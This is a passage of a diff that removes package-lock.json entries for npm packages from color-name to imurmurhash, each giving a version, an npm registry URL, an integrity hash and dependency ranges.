"sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "requires": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - } - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deep-is": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", - "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", - "dev": true, - "peer": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "requires": { - "esutils": "^2.0.2" - } - }, - "dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "requires": { - "is-obj": "^2.0.0" - } - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true - }, - "eslint": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.44.0.tgz", - "integrity": "sha512-0wpHoUbDUHgNCyvFB5aXLiQVfK9B0at6gUvzy83k4kAsQ/u769TQDX6iKC+aO4upIHO9WSaA3QoXYQDHbNwf1A==", - "dev": true, - "peer": true, - "requires": { - "@eslint-community/eslint-utils": "^4.2.0", - "@eslint-community/regexpp": "^4.4.0", - "@eslint/eslintrc": "^2.1.0", - "@eslint/js": "8.44.0", - "@humanwhocodes/config-array": "^0.11.10", - "@humanwhocodes/module-importer": "^1.0.1", - "@nodelib/fs.walk": "^1.2.8", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.3.2", - "doctrine": "^3.0.0", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^7.2.0", - "eslint-visitor-keys": "^3.4.1", - "espree": "^9.6.0", - "esquery": "^1.4.2", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "find-up": "^5.0.0", - "glob-parent": "^6.0.2", - "globals": "^13.19.0", - "graphemer": "^1.4.0", - "ignore": "^5.2.0", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "is-path-inside": "^3.0.3", - "js-yaml": "^4.1.0", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.1.2", - "natural-compare": "^1.4.0", - "optionator": "^0.9.3", - "strip-ansi": "^6.0.1", - "strip-json-comments": "^3.1.0", - "text-table": "^0.2.0" - } - }, - "eslint-scope": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.0.tgz", - "integrity": "sha512-DYj5deGlHBfMt15J7rdtyKNq/Nqlv5KfU4iodrQ019XESsRnwXH9KAE0y3cwtUHDo2ob7CypAnCqefh6vioWRw==", - "dev": true, - "peer": true, - "requires": { - "esrecurse": "^4.3.0", - "estraverse": "^5.2.0" - } - }, - "eslint-visitor-keys": { - "version": "3.4.1", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", - "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", - "dev": true, - "peer": true - }, - "espree": { - "version": "9.6.0", - "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.0.tgz", - "integrity": "sha512-1FH/IiruXZ84tpUlm0aCUEwMl2Ho5ilqVh0VvQXw+byAz/4SAciyHLlfmL5WYqsvD38oymdUwBss0LtK8m4s/A==", - "dev": true, - "peer": true, - "requires": { - "acorn": "^8.9.0", - "acorn-jsx": "^5.3.2", - "eslint-visitor-keys": "^3.4.1" - } - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "esquery": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.5.0.tgz", - "integrity": "sha512-YQLXUplAwJgCydQ78IMJywZCceoqk1oH01OERdSAJc/7U2AylwjhSCLDEtqwg811idIS/9fIU5GjG73IgjKMVg==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.1.0" - } - }, - "esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "requires": { - "estraverse": "^5.2.0" - } - }, - "estraverse": { - "version": "5.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", - "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", - "dev": true, - "peer": true - }, - "esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", - "dev": true, - "peer": true - }, - "fastq": { - "version": "1.15.0", - "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", - "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", - "dev": true, - "peer": true, - "requires": { - "reusify": "^1.0.4" - } - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "requires": { - "flat-cache": "^3.0.4" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", - "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", - "dev": true, - "peer": true, - "requires": { - "locate-path": "^6.0.0", - "path-exists": "^4.0.0" - } - }, - "flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "requires": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - } - }, - "flatted": { - "version": "3.2.7", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.7.tgz", - "integrity": "sha512-5nqDSxl8nn5BSNxyR3n4I6eDmbolI6WT+QqR547RwxQapgjQBmtktdP+HTBb/a/zLsbzERTONyUB5pefh5TtjQ==", - "dev": true, - "peer": true - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "glob-parent": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", - "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", - "dev": true, - "peer": true, - "requires": { - "is-glob": "^4.0.3" - } - }, - "globals": { - "version": "13.20.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.20.0.tgz", - "integrity": "sha512-Qg5QtVkCy/kv3FUSlu4ukeZDVf9ee0iXLAUYX13gbR17bnejFTzr4iS9bY7kwCf1NztRNm1t91fjOiyx4CSwPQ==", - "dev": true, - "peer": true, - "requires": { - "type-fest": "^0.20.2" - } - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "graphemer": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", - "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==", - "dev": true, - "peer": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "ignore": { - "version": "5.2.4", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", - "integrity": "sha512-MAb38BcSbH0eHNBxn7ql2NH/kX33OkB3lZ1BNdh7ENeRChHTYsTvWrMubiIAMNS2llXEEgZ1MUOBtXChP3kaFQ==", - "dev": true, - "peer": true - }, - "import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "requires": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - } - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": 